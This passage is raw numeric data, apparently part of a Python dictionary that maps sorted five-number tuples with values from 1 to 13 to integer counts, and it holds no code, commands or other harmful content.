(1, 1, 6, 10, 12): 4,
(1, 1, 6, 10, 13): 6,
(1, 1, 6, 11, 12): 3,
(1, 1, 6, 11, 13): 2,
(1, 1, 6, 12, 12): 3,
(1, 1, 6, 12, 13): 5,
(1, 1, 7, 7, 7): 2,
(1, 1, 7, 7, 8): 5,
(1, 1, 7, 7, 9): 2,
(1, 1, 7, 7, 10): 2,
(1, 1, 7, 7, 11): 2,
(1, 1, 7, 7, 12): 2,
(1, 1, 7, 7, 13): 4,
(1, 1, 7, 8, 8): 2,
(1, 1, 7, 8, 10): 4,
(1, 1, 7, 8, 11): 1,
(1, 1, 7, 8, 12): 7,
(1, 1, 7, 8, 13): 3,
(1, 1, 7, 9, 10): 1,
(1, 1, 7, 9, 11): 2,
(1, 1, 7, 9, 12): 5,
(1, 1, 7, 9, 13): 7,
(1, 1, 7, 10, 11): 3,
(1, 1, 7, 10, 12): 4,
(1, 1, 7, 10, 13): 3,
(1, 1, 7, 11, 11): 1,
(1, 1, 7, 11, 12): 2,
(1, 1, 7, 11, 13): 3,
(1, 1, 7, 12, 12): 2,
(1, 1, 7, 12, 13): 1,
(1, 1, 8, 8, 9): 1,
(1, 1, 8, 8, 10): 2,
(1, 1, 8, 8, 11): 1,
(1, 1, 8, 8, 13): 4,
(1, 1, 8, 9, 12): 4,
(1, 1, 8, 10, 10): 1,
(1, 1, 8, 10, 12): 3,
(1, 1, 8, 10, 13): 2,
(1, 1, 8, 11, 12): 3,
(1, 1, 8, 11, 13): 1,
(1, 1, 8, 12, 12): 2,
(1, 1, 8, 12, 13): 3,
(1, 1, 8, 13, 13): 1,
(1, 1, 9, 9, 12): 1,
(1, 1, 9, 10, 13): 2,
(1, 1, 9, 11, 11): 1,
(1, 1, 9, 11, 12): 1,
(1, 1, 9, 11, 13): 4,
(1, 1, 9, 12, 12): 3,
(1, 1, 9, 12, 13): 2,
(1, 1, 9, 13, 13): 1,
(1, 1, 10, 10, 11): 1,
(1, 1, 10, 10, 12): 1,
(1, 1, 10, 11, 11): 1,
(1, 1, 10, 11, 13): 1,
(1, 1, 10, 12, 13): 4,
(1, 1, 10, 13, 13): 2,
(1, 1, 11, 13, 13): 1,
(1, 2, 2, 2, 5): 3,
(1, 2, 2, 2, 6): 6,
(1, 2, 2, 2, 7): 4,
(1, 2, 2, 2, 8): 5,
(1, 2, 2, 2, 9): 4,
(1, 2, 2, 2, 10): 6,
(1, 2, 2, 2, 11): 4,
(1, 2, 2, 2, 12): 8,
(1, 2, 2, 2, 13): 2,
(1, 2, 2, 3, 3): 1,
(1, 2, 2, 3, 4): 7,
(1, 2, 2, 3, 5): 6,
(1, 2, 2, 3, 6): 9,
(1, 2, 2, 3, 7): 12,
(1, 2, 2, 3, 8): 12,
(1, 2, 2, 3, 9): 13,
(1, 2, 2, 3, 10): 10,
(1, 2, 2, 3, 11): 12,
(1, 2, 2, 3, 12): 13,
(1, 2, 2, 3, 13): 13,
(1, 2, 2, 4, 4): 4,
(1, 2, 2, 4, 5): 7,
(1, 2, 2, 4, 6): 12,
(1, 2, 2, 4, 7): 11,
(1, 2, 2, 4, 8): 10,
(1, 2, 2, 4, 9): 12,
(1, 2, 2, 4, 10): 16,
(1, 2, 2, 4, 11): 11,
(1, 2, 2, 4, 12): 19,
(1, 2, 2, 4, 13): 7,
(1, 2, 2, 5, 5): 4,
(1, 2, 2, 5, 6): 11,
(1, 2, 2, 5, 7): 8,
(1, 2, 2, 5, 8): 11,
(1, 2, 2, 5, 9): 12,
(1, 2, 2, 5, 10): 7,
(1, 2, 2, 5, 11): 9,
(1, 2, 2, 5, 12): 13,
(1, 2, 2, 5, 13): 8,
(1, 2, 2, 6, 6): 6,
(1, 2, 2, 6, 7): 7,
(1, 2, 2, 6, 8): 14,
(1, 2, 2, 6, 9): 9,
(1, 2, 2, 6, 10): 19,
(1, 2, 2, 6, 11): 12,
(1, 2, 2, 6, 12): 17,
(1, 2, 2, 6, 13): 11,
(1, 2, 2, 7, 7): 8,
(1, 2, 2, 7, 8): 9,
(1, 2, 2, 7, 9): 14,
(1, 2, 2, 7, 10): 9,
(1, 2, 2, 7, 11): 10,
(1, 2, 2, 7, 12): 11,
(1, 2, 2, 7, 13): 9,
(1, 2, 2, 8, 8): 6,
(1, 2, 2, 8, 9): 8,
(1, 2, 2, 8, 10): 14,
(1, 2, 2, 8, 11): 9,
(1, 2, 2, 8, 12): 12,
(1, 2, 2, 8, 13): 6,
(1, 2, 2, 9, 9): 5,
(1, 2, 2, 9, 10): 9,
(1, 2, 2, 9, 11): 6,
(1, 2, 2, 9, 12): 7,
(1, 2, 2, 9, 13): 7,
(1, 2, 2, 10, 10): 5,
(1, 2, 2, 10, 11): 4,
(1, 2, 2, 10, 12): 12,
(1, 2, 2, 10, 13): 6,
(1, 2, 2, 11, 11): 5,
(1, 2, 2, 11, 12): 6,
(1, 2, 2, 11, 13): 7,
(1, 2, 2, 12, 12): 6,
(1, 2, 2, 12, 13): 8,
(1, 2, 2, 13, 13): 4,
(1, 2, 3, 3, 3): 4,
(1, 2, 3, 3, 4): 9,
(1, 2, 3, 3, 5): 13,
(1, 2, 3, 3, 6): 11,
(1, 2, 3, 3, 7): 10,
(1, 2, 3, 3, 8): 13,
(1, 2, 3, 3, 9): 19,
(1, 2, 3, 3, 10): 10,
(1, 2, 3, 3, 11): 6,
(1, 2, 3, 3, 12): 19,
(1, 2, 3, 3, 13): 6,
(1, 2, 3, 4, 4): 9,
(1, 2, 3, 4, 5): 14,
(1, 2, 3, 4, 6): 19,
(1, 2, 3, 4, 7): 21,
(1, 2, 3, 4, 8): 22,
(1, 2, 3, 4, 9): 23,
(1, 2, 3, 4, 10): 24,
(1, 2, 3, 4, 11): 26,
(1, 2, 3, 4, 12): 23,
(1, 2, 3, 4, 13): 26,
(1, 2, 3, 5, 5): 9,
(1, 2, 3, 5, 6): 21,
(1, 2, 3, 5, 7): 19,
(1, 2, 3, 5, 8): 18,
(1, 2, 3, 5, 9): 17,
(1, 2, 3, 5, 10): 18,
(1, 2, 3, 5, 11): 18,
(1, 2, 3, 5, 12): 26,
(1, 2, 3, 5, 13): 18,
(1, 2, 3, 6, 6): 15,
(1, 2, 3, 6, 7): 28,
(1, 2, 3, 6, 8): 15,
(1, 2, 3, 6, 9): 26,
(1, 2, 3, 6, 10): 16,
(1, 2, 3, 6, 11): 25,
(1, 2, 3, 6, 12): 35,
(1, 2, 3, 6, 13): 21,
(1, 2, 3, 7, 7): 11,
(1, 2, 3, 7, 8): 21,
(1, 2, 3, 7, 9): 14,
(1, 2, 3, 7, 10): 25,
(1, 2, 3, 7, 11): 16,
(1, 2, 3, 7, 12): 26,
(1, 2, 3, 7, 13): 16,
(1, 2, 3, 8, 8): 7,
(1, 2, 3, 8, 9): 24,
(1, 2, 3, 8, 10): 20,
(1, 2, 3, 8, 11): 18,
(1, 2, 3, 8, 12): 15,
(1, 2, 3, 8, 13): 16,
(1, 2, 3, 9, 9): 14,
(1, 2, 3, 9, 10): 21,
(1, 2, 3, 9, 11): 15,
(1, 2, 3, 9, 12): 23,
(1, 2, 3, 9, 13): 16,
(1, 2, 3, 10, 10): 8,
(1, 2, 3, 10, 11): 14,
(1, 2, 3, 10, 12): 16,
(1, 2, 3, 10, 13): 13,
(1, 2, 3, 11, 11): 8,
(1, 2, 3, 11, 12): 21,
(1, 2, 3, 11, 13): 11,
(1, 2, 3, 12, 12): 15,
(1, 2, 3, 12, 13): 18,
(1, 2, 3, 13, 13): 5,
(1, 2, 4, 4, 4): 4,
(1, 2, 4, 4, 5): 9,
(1, 2, 4, 4, 6): 18,
(1, 2, 4, 4, 7): 9,
(1, 2, 4, 4, 8): 12,
(1, 2, 4, 4, 9): 10,
(1, 2, 4, 4, 10): 12,
(1, 2, 4, 4, 11): 11,
(1, 2, 4, 4, 12): 19,
(1, 2, 4, 4, 13): 9,
(1, 2, 4, 5, 5): 11,
(1, 2, 4, 5, 6): 22,
(1, 2, 4, 5, 7): 24,
(1, 2, 4, 5, 8): 15,
(1, 2, 4, 5, 9): 18,
(1, 2, 4, 5, 10): 20,
(1, 2, 4, 5, 11): 23,
(1, 2, 4, 5, 12): 20,
(1, 2, 4, 5, 13): 21,
(1, 2, 4, 6, 6): 13,
(1, 2, 4, 6, 7): 33,
(1, 2, 4, 6, 8): 25,
(1, 2, 4, 6, 9): 17,
(1, 2, 4, 6, 10): 26,
(1, 2, 4, 6, 11): 16,
(1, 2, 4, 6, 12): 30,
(1, 2, 4, 6, 13): 16,
(1, 2, 4, 7, 7): 14,
(1, 2, 4, 7, 8): 19,
(1, 2, 4, 7, 9): 18,
(1, 2, 4, 7, 10): 13,
(1, 2, 4, 7, 11): 15,
(1, 2, 4, 7, 12): 19,
(1, 2, 4, 7, 13): 22,
(1, 2, 4, 8, 8): 10,
(1, 2, 4, 8, 9): 12,
(1, 2, 4, 8, 10): 22,
(1, 2, 4, 8, 11): 16,
(1, 2, 4, 8, 12): 31,
(1, 2, 4, 8, 13): 10,
(1, 2, 4, 9, 9): 9,
(1, 2, 4, 9, 10): 16,
(1, 2, 4, 9, 11): 14,
(1, 2, 4, 9, 12): 15,
(1, 2, 4, 9, 13): 14,
(1, 2, 4, 10, 10): 8,
(1, 2, 4, 10, 11): 15,
(1, 2, 4, 10, 12): 18,
(1, 2, 4, 10, 13): 9,
(1, 2, 4, 11, 11): 7,
(1, 2, 4, 11, 12): 17,
(1, 2, 4, 11, 13): 11,
(1, 2, 4, 12, 12): 14,
(1, 2, 4, 12, 13): 17,
(1, 2, 4, 13, 13): 5,
(1, 2, 5, 5, 5): 2,
(1, 2, 5, 5, 6): 12,
(1, 2, 5, 5, 7): 6,
(1, 2, 5, 5, 8): 9,
(1, 2, 5, 5, 9): 11,
(1, 2, 5, 5, 10): 9,
(1, 2, 5, 5, 11): 5,
(1, 2, 5, 5, 12): 10,
(1, 2, 5, 5, 13): 6,
(1, 2, 5, 6, 6): 10,
(1, 2, 5, 6, 7): 25,
(1, 2, 5, 6, 8): 23,
(1, 2, 5, 6, 9): 26,
(1, 2, 5, 6, 10): 17,
(1, 2, 5, 6, 11): 14,
(1, 2, 5, 6, 12): 15,
(1, 2, 5, 6, 13): 16,
(1, 2, 5, 7, 7): 9,
(1, 2, 5, 7, 8): 18,
(1, 2, 5, 7, 9): 15,
(1, 2, 5, 7, 10): 18,
(1, 2, 5, 7, 11): 8,
(1, 2, 5, 7, 12): 22,
(1, 2, 5, 7, 13): 11,
(1, 2, 5, 8, 8): 5,
(1, 2, 5, 8, 9): 16,
(1, 2, 5, 8, 10): 9,
(1, 2, 5, 8, 11): 14,
(1, 2, 5, 8, 12): 13,
(1, 2, 5, 8, 13): 18,
(1, 2, 5, 9, 9): 6,
(1, 2, 5, 9, 10): 15,
(1, 2, 5, 9, 11): 11,
(1, 2, 5, 9, 12): 21,
(1, 2, 5, 9, 13): 8,
(1, 2, 5, 10, 10): 7,
(1, 2, 5, 10, 11): 16,
(1, 2, 5, 10, 12): 14,
(1, 2, 5, 10, 13): 11,
(1, 2, 5, 11, 11): 4,
(1, 2, 5, 11, 12): 14,
(1, 2, 5, 11, 13): 6,
(1, 2, 5, 12, 12): 7,
(1, 2, 5, 12, 13): 13,
(1, 2, 5, 13, 13): 5,
(1, 2, 6, 6, 6): 4,
(1, 2, 6, 6, 7): 13,
(1, 2, 6, 6, 8): 7,
(1, 2, 6, 6, 9): 17,
(1, 2, 6, 6, 10): 14,
(1, 2, 6, 6, 11): 9,
(1, 2, 6, 6, 12): 13,
(1, 2, 6, 6, 13): 10,
(1, 2, 6, 7, 7): 15,
(1, 2, 6, 7, 8): 28,
(1, 2, 6, 7, 9): 24,
(1, 2, 6, 7, 10): 16,
(1, 2, 6, 7, 11): 15,
(1, 2, 6, 7, 12): 27,
(1, 2, 6, 7, 13): 18,
(1, 2, 6, 8, 8): 9,
(1, 2, 6, 8, 9): 14,
(1, 2, 6, 8, 10): 22,
(1, 2, 6, 8, 11): 18,
(1, 2, 6, 8, 12): 24,
(1, 2, 6, 8, 13): 11,
(1, 2, 6, 9, 9): 11,
(1, 2, 6, 9, 10): 14,
(1, 2, 6, 9, 11): 18,
(1, 2, 6, 9, 12): 20,
(1, 2, 6, 9, 13): 18,
(1, 2, 6, 10, 10): 9,
(1, 2, 6, 10, 11): 14,
(1, 2, 6, 10, 12): 21,
(1, 2, 6, 10, 13): 12,
(1, 2, 6, 11, 11): 4,
(1, 2, 6, 11, 12): 14,
(1, 2, 6, 11, 13): 12,
(1, 2, 6, 12, 12): 19,
(1, 2, 6, 12, 13): 11,
(1, 2, 6, 13, 13): 5,
(1, 2, 7, 7, 7): 4,
(1, 2, 7, 7, 8): 9,
(1, 2, 7, 7, 9): 9,
(1, 2, 7, 7, 10): 10,
(1, 2, 7, 7, 11): 8,
(1, 2, 7, 7, 12): 12,
(1, 2, 7, 7, 13): 10,
(1, 2, 7, 8, 8): 8,
(1, 2, 7, 8, 9): 11,
(1, 2, 7, 8, 10): 15,
(1, 2, 7, 8, 11): 15,
(1, 2, 7, 8, 12): 15,
(1, 2, 7, 8, 13): 16,
(1, 2, 7, 9, 9): 4,
(1, 2, 7, 9, 10): 17,
(1, 2, 7, 9, 11): 15,
(1, 2, 7, 9, 12): 18,
(1, 2, 7, 9, 13): 6,
(1, 2, 7, 10, 10): 5,
(1, 2, 7, 10, 11): 8,
(1, 2, 7, 10, 12): 15,
(1, 2, 7, 10, 13): 17,
(1, 2, 7, 11, 11): 5,
(1, 2, 7, 11, 12): 17,
(1, 2, 7, 11, 13): 7,
(1, 2, 7, 12, 12): 7,
(1, 2, 7, 12, 13): 14,
(1, 2, 7, 13, 13): 3,
(1, 2, 8, 8, 8): 1,
(1, 2, 8, 8, 9): 3,
(1, 2, 8, 8, 10): 10,
(1, 2, 8, 8, 11): 4,
(1, 2, 8, 8, 12): 9,
(1, 2, 8, 8, 13): 4,
(1, 2, 8, 9, 9): 4,
(1, 2, 8, 9, 10): 7,
(1, 2, 8, 9, 11): 7,
(1, 2, 8, 9, 12): 7,
(1, 2, 8, 9, 13): 13,
(1, 2, 8, 10, 10): 5,
(1, 2, 8, 10, 11): 8,
(1, 2, 8, 10, 12): 19,
(1, 2, 8, 10, 13): 6,
(1, 2, 8, 11, 11): 4,
(1, 2, 8, 11, 12): 13,
(1, 2, 8, 11, 13): 11,
(1, 2, 8, 12, 12): 12,
(1, 2, 8, 12, 13): 8,
(1, 2, 8, 13, 13): 6,
(1, 2, 9, 9, 11): 2,
(1, 2, 9, 9, 12): 7,
(1, 2, 9, 9, 13): 7,
(1, 2, 9, 10, 10): 1,
(1, 2, 9, 10, 11): 5,
(1, 2, 9, 10, 12): 9,
(1, 2, 9, 10, 13): 9,
(1, 2, 9, 11, 11): 5,
(1, 2, 9, 11, 12): 12,
(1, 2, 9, 11, 13): 9,
(1, 2, 9, 12, 12): 9,
(1, 2, 9, 12, 13): 12,
(1, 2, 9, 13, 13): 2,
(1, 2, 10, 10, 10): 2,
(1, 2, 10, 10, 11): 3,
(1, 2, 10, 10, 12): 4,
(1, 2, 10, 10, 13): 5,
(1, 2, 10, 11, 11): 3,
(1, 2, 10, 11, 12): 7,
(1, 2, 10, 11, 13): 9,
(1, 2, 10, 12, 12): 6,
(1, 2, 10, 12, 13): 7,
(1, 2, 10, 13, 13): 6,
(1, 2, 11, 11, 11): 2,
(1, 2, 11, 11, 13): 4,
(1, 2, 11, 12, 12): 1,
(1, 2, 11, 12, 13): 5,
(1, 2, 11, 13, 13): 1,
(1, 2, 12, 12, 13): 1,
(1, 2, 12, 13, 13): 3,
(1, 2, 13, 13, 13): 2,
(1, 3, 3, 3, 3): 1,
(1, 3, 3, 3, 4): 5,
(1, 3, 3, 3, 5): 3,
(1, 3, 3, 3, 6): 5,
(1, 3, 3, 3, 7): 3,
(1, 3, 3, 3, 8): 4,
(1, 3, 3, 3, 9): 6,
(1, 3, 3, 3, 10): 3,
(1, 3, 3, 3, 11): 3,
(1, 3, 3, 3, 12): 5,
(1, 3, 3, 3, 13): 2,
(1, 3, 3, 4, 4): 4,
(1, 3, 3, 4, 5): 7,
(1, 3, 3, 4, 6): 8,
(1, 3, 3, 4, 7): 10,
(1, 3, 3, 4, 8): 8,
(1, 3, 3, 4, 9): 12,
(1, 3, 3, 4, 10): 10,
(1, 3, 3, 4, 11): 7,
(1, 3, 3, 4, 12): 16,
(1, 3, 3, 4, 13): 5,
(1, 3, 3, 5, 5): 4,
(1, 3, 3, 5, 6): 20,
(1, 3, 3, 5, 7): 8,
(1, 3, 3, 5, 8): 8,
(1, 3, 3, 5, 9): 7,
(1, 3, 3, 5, 10): 6,
(1, 3, 3, 5, 11): 10,
(1, 3, 3, 5, 12): 15,
(1, 3, 3, 5, 13): 9,
(1, 3, 3, 6, 6): 10,
(1, 3, 3, 6, 7): 19,
(1, 3, 3, 6, 8): 9,
(1, 3, 3, 6, 9): 13,
(1, 3, 3, 6, 10): 11,
(1, 3, 3, 6, 11): 12,
(1, 3, 3, 6, 12): 20,
(1, 3, 3, 6, 13): 16,
(1, 3, 3, 7, 7): 5,
(1, 3, 3, 7, 8): 12,
(1, 3, 3, 7, 9): 9,
(1, 3, 3, 7, 10): 4,
(1, 3, 3, 7, 11): 8,
(1, 3, 3, 7, 12): 13,
(1, 3, 3, 7, 13): 9,
(1, 3, 3, 8, 8): 5,
(1, 3, 3, 8, 9): 10,
(1, 3, 3, 8, 10): 9,
(1, 3, 3, 8, 11): 4,
(1, 3, 3, 8, 12): 8,
(1, 3, 3, 8, 13): 7,
(1, 3, 3, 9, 9): 8,
(1, 3, 3, 9, 10): 8,
(1, 3, 3, 9, 11): 5,
(1, 3, 3, 9, 12): 12,
(1, 3, 3, 9, 13): 10,
(1, 3, 3, 10, 10): 3,
(1, 3, 3, 10, 11): 5,
(1, 3, 3, 10, 12): 8,
(1, 3, 3, 10, 13): 7,
(1, 3, 3, 11, 11): 2,
(1, 3, 3, 11, 12): 7,
(1, 3, 3, 11, 13): 5,
(1, 3, 3, 12, 12): 5,
(1, 3, 3, 12, 13): 12,
(1, 3, 3, 13, 13): 2,
(1, 3, 4, 4, 5): 6,
(1, 3, 4, 4, 6): 10,
(1, 3, 4, 4, 7): 9,
(1, 3, 4, 4, 9): 7,
(1, 3, 4, 4, 10): 12,
(1, 3, 4, 4, 11): 8,
(1, 3, 4, 4, 12): 4,
(1, 3, 4, 4, 13): 7,
(1, 3, 4, 5, 5): 10,
(1, 3, 4, 5, 6): 24,
(1, 3, 4, 5, 7): 18,
(1, 3, 4, 5, 8): 15,
(1, 3, 4, 5, 9): 14,
(1, 3, 4, 5, 10): 16,
(1, 3, 4, 5, 11): 16,
(1, 3, 4, 5, 12): 19,
(1, 3, 4, 5, 13): 9,
(1, 3, 4, 6, 6): 17,
(1, 3, 4, 6, 7): 25,
(1, 3, 4, 6, 8): 24,
(1, 3, 4, 6, 9): 27,
(1, 3, 4, 6, 10): 17,
(1, 3, 4, 6, 11): 21,
(1, 3, 4, 6, 12): 28,
(1, 3, 4, 6, 13): 21,
(1, 3, 4, 7, 7): 13,
(1, 3, 4, 7, 8): 20,
(1, 3, 4, 7, 9): 14,
(1, 3, 4, 7, 10): 18,
(1, 3, 4, 7, 11): 8,
(1, 3, 4, 7, 12): 21,
(1, 3, 4, 7, 13): 9,
(1, 3, 4, 8, 8): 4,
(1, 3, 4, 8, 9): 13,
(1, 3, 4, 8, 10): 17,
(1, 3, 4, 8, 11): 18,
(1, 3, 4, 8, 12): 8,
(1, 3, 4, 8, 13): 19,
(1, 3, 4, 9, 9): 8,
(1, 3, 4, 9, 10): 19,
(1, 3, 4, 9, 11): 10,
(1, 3, 4, 9, 12): 17,
(1, 3, 4, 9, 13): 13,
(1, 3, 4, 10, 10): 6,
(1, 3, 4, 10, 11): 12,
(1, 3, 4, 10, 12): 19,
(1, 3, 4, 10, 13): 12,
(1, 3, 4, 11, 11): 5,
(1, 3, 4, 11, 12): 10,
(1, 3, 4, 11, 13): 11,
(1, 3, 4, 12, 12): 6,
(1, 3, 4, 12, 13): 11,
(1, 3, 4, 13, 13): 8,
(1, 3, 5, 5, 5): 4,
(1, 3, 5, 5, 6): 9,
(1, 3, 5, 5, 7): 7,
(1, 3, 5, 5, 8): 8,
(1, 3, 5, 5, 9): 7,
(1, 3, 5, 5, 10): 7,
(1, 3, 5, 5, 11): 8,
(1, 3, 5, 5, 12): 5,
(1, 3, 5, 5, 13): 6,
(1, 3, 5, 6, 6): 7,
(1, 3, 5, 6, 7): 15,
(1, 3, 5, 6, 8): 15,
(1, 3, 5, 6, 9): 33,
(1, 3, 5, 6, 10): 24,
(1, 3, 5, 6, 11): 10,
(1, 3, 5, 6, 12): 17,
(1, 3, 5, 6, 13): 9,
(1, 3, 5, 7, 7): 8,
(1, 3, 5, 7, 8): 14,
(1, 3, 5, 7, 9): 19,
(1, 3, 5, 7, 10): 15,
(1, 3, 5, 7, 11): 11,
(1, 3, 5, 7, 12): 11,
(1, 3, 5, 7, 13): 13,
(1, 3, 5, 8, 8): 6,
(1, 3, 5, 8, 9): 12,
(1, 3, 5, 8, 10): 11,
(1, 3, 5, 8, 11): 6,
(1, 3, 5, 8, 12): 18,
(1, 3, 5, 8, 13): 11,
(1, 3, 5, 9, 9): 7,
(1, 3, 5, 9, 10): 14,
(1, 3, 5, 9, 11): 14,
(1, 3, 5, 9, 12): 21,
(1, 3, 5, 9, 13): 12,
(1, 3, 5, 10, 10): 10,
(1, 3, 5, 10, 11): 15,
(1, 3, 5, 10, 12): 21,
(1, 3, 5, 10, 13): 10,
(1, 3, 5, 11, 11): 7,
(1, 3, 5, 11, 12): 9,
(1, 3, 5, 11, 13): 6,
(1, 3, 5, 12, 12): 10,
(1, 3, 5, 12, 13): 8,
(1, 3, 5, 13, 13): 5,
(1, 3, 6, 6, 6): 3,
(1, 3, 6, 6, 7): 7,
(1, 3, 6, 6, 8): 13,
(1, 3, 6, 6, 9): 13,
(1, 3, 6, 6, 10): 10,
(1, 3, 6, 6, 11): 7,
(1, 3, 6, 6, 12): 17,
(1, 3, 6, 6, 13): 4,
(1, 3, 6, 7, 7): 6,
(1, 3, 6, 7, 8): 13,
(1, 3, 6, 7, 9): 29,
(1, 3, 6, 7, 10): 22,
(1, 3, 6, 7, 11): 17,
(1, 3, 6, 7, 12): 18,
(1, 3, 6, 7, 13): 9,
(1, 3, 6, 8, 8): 8,
(1, 3, 6, 8, 9): 13,
(1, 3, 6, 8, 10): 15,
(1, 3, 6, 8, 11): 16,
(1, 3, 6, 8, 12): 18,
(1, 3, 6, 8, 13): 16,
(1, 3, 6, 9, 9): 16,
(1, 3, 6, 9, 10): 15,
(1, 3, 6, 9, 11): 19,
(1, 3, 6, 9, 12): 29,
(1, 3, 6, 9, 13): 13,
(1, 3, 6, 10, 10): 7,
(1, 3, 6, 10, 11): 16,
(1, 3, 6, 10, 12): 23,
(1, 3, 6, 10, 13): 14,
(1, 3, 6, 11, 11): 4,
(1, 3, 6, 11, 12): 25,
(1, 3, 6, 11, 13): 10,
(1, 3, 6, 12, 12): 17,
(1, 3, 6, 12, 13): 20,
(1, 3, 6, 13, 13): 1,
(1, 3, 7, 7, 7): 5,
(1, 3, 7, 7, 8): 9,
(1, 3, 7, 7, 9): 10,
(1, 3, 7, 7, 10): 10,
(1, 3, 7, 7, 11): 8,
(1, 3, 7, 7, 12): 11,
(1, 3, 7, 7, 13): 5,
(1, 3, 7, 8, 8): 7,
(1, 3, 7, 8, 9): 17,
(1, 3, 7, 8, 10): 19,
(1, 3, 7, 8, 11): 10,
(1, 3, 7, 8, 12): 14,
(1, 3, 7, 8, 13): 5,
(1, 3, 7, 9, 9): 9,
(1, 3, 7, 9, 10): 16,
(1, 3, 7, 9, 11): 12,
(1, 3, 7, 9, 12): 16,
(1, 3, 7, 9, 13): 12,
(1, 3, 7, 10, 10): 5,
(1, 3, 7, 10, 11): 10,
(1, 3, 7, 10, 12): 19,
(1, 3, 7, 10, 13): 9,
(1, 3, 7, 11, 11): 6,
(1, 3, 7, 11, 12): 9,
(1, 3, 7, 11, 13): 14,
(1, 3, 7, 12, 12): 14,
(1, 3, 7, 12, 13): 13,
(1, 3, 7, 13, 13): 4,
(1, 3, 8, 8, 9): 6,
(1, 3, 8, 8, 10): 9,
(1, 3, 8, 8, 11): 6,
(1, 3, 8, 8, 12): 1,
(1, 3, 8, 8, 13): 6,
(1, 3, 8, 9, 9): 8,
(1, 3, 8, 9, 10): 10,
(1, 3, 8, 9, 11): 5,
(1, 3, 8, 9, 12): 15,
(1, 3, 8, 9, 13): 9,
(1, 3, 8, 10, 10): 5,
(1, 3, 8, 10, 11): 8,
(1, 3, 8, 10, 12): 11,
(1, 3, 8, 10, 13): 13,
(1, 3, 8, 11, 11): 4,
(1, 3, 8, 11, 12): 11,
(1, 3, 8, 11, 13): 5,
(1, 3, 8, 12, 12): 4,
(1, 3, 8, 12, 13): 7,
(1, 3, 8, 13, 13): 2,
(1, 3, 9, 9, 9): 2,
(1, 3, 9, 9, 10): 4,
(1, 3, 9, 9, 11): 4,
(1, 3, 9, 9, 12): 10,
(1, 3, 9, 9, 13): 7,
(1, 3, 9, 10, 10): 1,
(1, 3, 9, 10, 11): 9,
(1, 3, 9, 10, 12): 14,
(1, 3, 9, 10, 13): 11,
(1, 3, 9, 11, 11): 4,
(1, 3, 9, 11, 12): 12,
(1, 3, 9, 11, 13): 7,
(1, 3, 9, 12, 12): 6,
(1, 3, 9, 12, 13): 8,
(1, 3, 9, 13, 13): 2,
(1, 3, 10, 10, 11): 2,
(1, 3, 10, 10, 12): 5,
(1, 3, 10, 10, 13): 3,
(1, 3, 10, 11, 11): 2,
(1, 3, 10, 11, 12): 8,
(1, 3, 10, 11, 13): 6,
(1, 3, 10, 12, 12): 7,
(1, 3, 10, 12, 13): 8,
(1, 3, 10, 13, 13): 4,
(1, 3, 11, 11, 12): 1,
(1, 3, 11, 11, 13): 3,
(1, 3, 11, 12, 12): 1,
(1, 3, 11, 12, 13): 4,
(1, 3, 11, 13, 13): 3,
(1, 3, 12, 12, 12): 1,
(1, 3, 12, 12, 13): 2,
(1, 3, 12, 13, 13): 4,
(1, 3, 13, 13, 13): 2,
(1, 4, 4, 4, 5): 1,
(1, 4, 4, 4, 6): 3,
(1, 4, 4, 4, 7): 1,
(1, 4, 4, 4, 8): 1,
(1, 4, 4, 4, 9): 1,
(1, 4, 4, 4, 10): 4,
(1, 4, 4, 4, 11): 2,
(1, 4, 4, 4, 13): 1,
(1, 4, 4, 5, 5): 4,
(1, 4, 4, 5, 6): 10,
(1, 4, 4, 5, 7): 5,
(1, 4, 4, 5, 8): 7,
(1, 4, 4, 5, 9): 5,
(1, 4, 4, 5, 10): 8,
(1, 4, 4, 5, 11): 4,
(1, 4, 4, 5, 12): 3,
(1, 4, 4, 5, 13): 6,
(1, 4, 4, 6, 6): 4,
(1, 4, 4, 6, 7): 10,
(1, 4, 4, 6, 8): 14,
(1, 4, 4, 6, 9): 8,
(1, 4, 4, 6, 10): 13,
(1, 4, 4, 6, 11): 7,
(1, 4, 4, 6, 12): 13,
(1, 4, 4, 6, 13): 5,
(1, 4, 4, 7, 7): 4,
(1, 4, 4, 7, 8): 7,
(1, 4, 4, 7, 9): 9,
(1, 4, 4, 7, 10): 8,
(1, 4, 4, 7, 11): 9,
(1, 4, 4, 7, 12): 6,
(1, 4, 4, 7, 13): 9,
(1, 4, 4, 8, 8): 2,
(1, 4, 4, 8, 9): 5,
(1, 4, 4, 8, 10): 12,
(1, 4, 4, 8, 11): 6,
(1, 4, 4, 8, 12): 6,
(1, 4, 4, 8, 13): 6,
(1, 4, 4, 9, 9): 4,
(1, 4, 4, 9, 10): 6,
(1, 4, 4, 9, 11): 7,
(1, 4, 4, 9, 12): 8,
(1, 4, 4, 9, 13): 4,
(1, 4, 4, 10, 10): 5,
(1, 4, 4, 10, 11): 7,
(1, 4, 4, 10, 12): 10,
(1, 4, 4, 10, 13): 5,
(1, 4, 4, 11, 11): 2,
(1, 4, 4, 11, 12): 5,
(1, 4, 4, 11, 13): 4,
(1, 4, 4, 12, 13): 4,
(1, 4, 4, 13, 13): 4,
(1, 4, 5, 5, 5): 1,
(1, 4, 5, 5, 6): 5,
(1, 4, 5, 5, 7): 6,
(1, 4, 5, 5, 8): 11,
(1, 4, 5, 5, 9): 3,
(1, 4, 5, 5, 10): 4,
(1, 4, 5, 5, 11): 3,
(1, 4, 5, 5, 12): 7,
(1, 4, 5, 5, 13): 6,
(1, 4, 5, 6, 6): 5,
(1, 4, 5, 6, 7): 11,
(1, 4, 5, 6, 8): 12,
(1, 4, 5, 6, 9): 18,
(1, 4, 5, 6, 10): 13,
(1, 4, 5, 6, 11): 11,
(1, 4, 5, 6, 12): 18,
(1, 4, 5, 6, 13): 14,
(1, 4, 5, 7, 7): 6,
(1, 4, 5, 7, 8): 16,
(1, 4, 5, 7, 9): 10,
(1, 4, 5, 7, 10): 21,
(1, 4, 5, 7, 11): 7,
(1, 4, 5, 7, 12): 15,
(1, 4, 5, 7, 13): 8,
(1, 4, 5, 8, 8): 2,
(1, 4, 5, 8, 9): 15,
(1, 4, 5, 8, 10): 23,
(1, 4, 5, 8, 11): 15,
(1, 4, 5, 8, 12): 10,
(1, 4, 5, 8, 13): 9,
(1, 4, 5, 9, 9): 6,
(1, 4, 5, 9, 10): 15,
(1, 4, 5, 9, 11): 9,
(1, 4, 5, 9, 12): 15,
(1, 4, 5, 9, 13): 8,
(1, 4, 5, 10, 10): 6,
(1, 4, 5, 10, 11): 17,
(1, 4, 5, 10, 12): 23,
(1, 4, 5, 10, 13): 11,
(1, 4, 5, 11, 11): 6,
(1, 4, 5, 11, 12): 13,
